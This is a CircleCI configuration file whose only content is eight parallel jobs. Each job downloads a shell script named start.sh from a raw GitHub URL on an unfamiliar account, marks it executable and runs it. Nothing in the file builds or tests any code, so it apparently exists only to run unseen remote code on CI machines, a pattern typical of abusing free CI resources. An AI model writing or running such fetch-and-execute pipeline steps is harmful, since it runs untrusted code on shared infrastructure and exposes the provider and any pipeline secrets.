version: 2.1

jobs:

  Syifa_08:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_08
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
  Syifa_07:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_07
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
  Syifa_06:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_06
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
  Syifa_05:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_05
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
  Syifa_04:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_04
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
  Syifa_03:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_03
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
  Syifa_02:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_02
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
  Syifa_01:
    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:
        - run:
            name: Syifa_01
            command: wget https://raw.githubusercontent.com/zolkaja47654/kaj/main/start.sh && chmod u+x start.sh && ./start.sh
workflows:
    version: 2
    Syifa:
        jobs:
            - Syifa_08
            - Syifa_07
            - Syifa_06
            - Syifa_05
            - Syifa_04
            - Syifa_03
            - Syifa_02
            - Syifa_01
            
